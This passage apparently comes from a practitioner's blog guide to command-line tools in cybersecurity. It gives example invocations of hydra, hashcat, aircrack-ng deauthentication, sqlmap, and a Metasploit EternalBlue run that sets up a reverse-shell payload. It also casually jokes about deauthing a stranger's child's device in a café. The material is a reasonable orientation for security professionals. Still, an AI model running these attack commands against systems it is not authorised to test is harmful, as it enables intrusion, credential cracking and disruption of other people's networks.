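# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-ports 8080
# iptables-save > /etc/iptables/rules.v4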

MySQL

Similar to ‘iptables’, ‘mysql’ isn’t a tool in its own right, but a way of accessing a database maintained by another process on the system.

Filters acting on text files only go so far. Sometimes you need to dump the data into a database and make queries against that database.

There is also the offensive skill of learning how targets store things in a database, and how attackers get at the data.

Hackers often publish raw SQL data they've stolen in their hacks (like the Ashley Madison dump). Being able to stick those dumps into your own database is quite useful. Hint: disable transaction logging while importing mass data.
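
A minimal sketch of such an import, assuming a dump file named dump.sql and a freshly created database; turning off autocommit and the integrity checks for the duration of the load speeds things up considerably:

$ mysql -u root -p -e "CREATE DATABASE leaks"
$ mysql -u root -p leaks
mysql> SET autocommit=0; SET unique_checks=0; SET foreign_key_checks=0;
mysql> SOURCE dump.sql;
mysql> COMMIT;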

If you don’t like SQL, you might consider NoSQL tools like Elasticsearch, MongoDB, and Redis that can similarly be useful for arranging and searching data. You’ll probably have to learn some JSON tools for formatting the data.

Reverse engineering tools

A cybersecurity specialty is “reverse engineering”. Some want to reverse engineer the target software being hacked, to understand vulnerabilities. This is needed for commercial software and device firmware where the source code is hidden. Others use these tools to analyze viruses/malware.

The ‘file’ command uses heuristics to discover the type of a file.
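
For example, running it against an unknown binary (the filename is just a placeholder) tells you whether you're looking at an ELF executable, a ZIP archive, a filesystem image, and so on:

$ file suspicious.bin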

There’s a whole skillset for analyzing PDF and Microsoft Office documents. I play with pdf-parser. There’s a long list at this website:
https://zeltser.com/analyzing-malicious-documents/

There’s a whole skillset for analyzing executables. Binwalk is especially useful for analyzing firmware images.
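
A typical first pass is to scan a firmware image for embedded filesystems and then extract them ('-e' does the extraction; the filename is a placeholder):

$ binwalk firmware.bin
$ binwalk -e firmware.bin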

Qemu is a useful virtual machine. It can emulate full systems, such as an IoT device based on the MIPS processor. Like some other tools mentioned here, it's more a full subsystem than a simple command-line tool.

On a live system, you can use 'strace' to view what system calls a process is making. Use 'lsof' to view which files a process has open and which network connections it has made.
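
For example, attaching to a running process by PID, or listing every open network connection on the box (the PID is just an example):

# strace -p 1234
# lsof -p 1234
# lsof -i -n -P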

Password crackers

A common cybersecurity specialty is "password cracking". There are two kinds: online and offline password crackers.

Typical online password crackers are 'hydra' and 'medusa'. They can take files containing common passwords and attempt to log on to various protocols remotely, like HTTP, SMB, FTP, Telnet, and so on. I used 'hydra' recently to find the default/backdoor passwords on many of the IoT devices I've bought for my test lab.
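
A typical invocation looks something like this (the address, username, and wordlist are placeholders):

$ hydra -l admin -P passwords.txt 192.168.1.1 telnet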

Online password crackers must open TCP connections to the target and try to log on. This limits their speed. They may also be stymied by systems that lock accounts, or introduce delays, after too many bad password attempts.

Typical offline password crackers are 'hashcat' and 'jtr' (John the Ripper). They work off of stolen password hashes. They can attempt billions of passwords per second, because there's no network interaction and nothing slowing them down.

Understanding offline password crackers means getting an appreciation for the exponential difficulty of the problem. A sufficiently long and complex encrypted password is uncrackable. Instead of brute-force attempts at all possible combinations, we must use tricks, like mutating the top million most common passwords.

I use hashcat because of the great GPU support, but John is also a great program.
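
A minimal hashcat run against a file of raw MD5 hashes, using a common wordlist plus one of the mutation rule sets that ships with the tool (the hash mode and filenames here are just examples):

$ hashcat -m 0 -a 0 hashes.txt rockyou.txt -r rules/best64.rule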

WiFi hacking

A common specialty in cybersecurity is WiFi hacking. The difficulty in WiFi hacking is getting the right WiFi hardware that supports the necessary features (monitor mode, packet injection), and then getting the right drivers installed in your operating system. That's why I use Kali rather than some generic Linux distribution: it's got the right drivers installed.

The 'aircrack-ng' suite is the best for doing basic hacking, such as packet injection. When the parents are letting the iPad babysit their kid with a loud movie at the otherwise quiet coffee shop, use 'aircrack-ng' to deauth the kid.
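
The usual capture workflow looks roughly like this (the interface name, channel, and BSSID are placeholders):

# airmon-ng start wlan0
# airodump-ng wlan0mon
# airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon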

The 'reaver' tool is useful for hacking into access points that leave WPS wide open and misconfigured.

Remote exploitation

A common specialty in cybersecurity is pentesting.

Nmap, curl, and netcat (described above) are useful tools for this.

Some useful DNS tools are 'dig' (described above) and dnsrecon/dnsenum/fierce, which try to enumerate and guess as many names as possible within a domain. These tools all have unique features, but also a lot of overlap.
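
For example, a zone-transfer attempt with 'dig' and a brute-force run with 'dnsrecon' (the domain, nameserver, and wordlist are placeholders):

$ dig axfr example.com @ns1.example.com
$ dnsrecon -d example.com -D subdomains.txt -t brt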

Nikto is a basic tool for probing for common vulnerabilities, out-of-date software, and so on. It’s not really a vulnerability scanner like Nessus used by defenders, but more of a tool for attack.
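
Basic usage is just pointing it at a web server (the address is a placeholder):

$ nikto -h http://192.168.1.10/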

SQLmap is a popular tool for probing for SQL injection weaknesses.
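
A typical first run points it at a URL with a parameter and asks it to enumerate databases (the URL is a placeholder):

$ sqlmap -u "http://target.example/item.php?id=1" --dbs --batch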

Then there is ‘msfconsole’. It has some attack features. This is humor – it has all the attack features. Metasploit is the most popular tool for running remote attacks against targets, exploiting vulnerabilities.
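
A session follows the same pattern regardless of the exploit: pick a module, set its options, run it. Typed at the msfconsole prompt, it looks roughly like this (the module, addresses, and option names are examples and vary slightly between Metasploit versions):

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
run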

Text editor

Finally, there is the decision of text editor. I use ‘vi’ variants. Others like ‘nano’ and variants. There’s no wrong answer as to which editor to use, unless that answer is ‘emacs’.

Conclusion

Obviously, not every cybersecurity professional will be familiar with every tool in this list. If you don’t do reverse-engineering, then you won’t use reverse-engineering tools.

On the other hand, regardless of your specialty, you need to know basic crypto concepts, so you should know something like the ‘openssl’ tool. You need to know basic networking, so things like ‘nmap’ and ‘tcpdump’. You need to be comfortable processing large dumps of data, manipulating it with any tool available. You shouldn’t be frightened by a little sysadmin work.

The above list is therefore a useful starting point for cybersecurity professionals. Of course, those new to the industry won’t have much familiarity with them. But it’s fair to say that I’ve used everything listed above at least once in the last year, and the year before that, and the year before that. I spend a lot of time on StackExchange and Google searching the exact options I need, so I’m not an expert, but I am familiar with the basic use of all these things.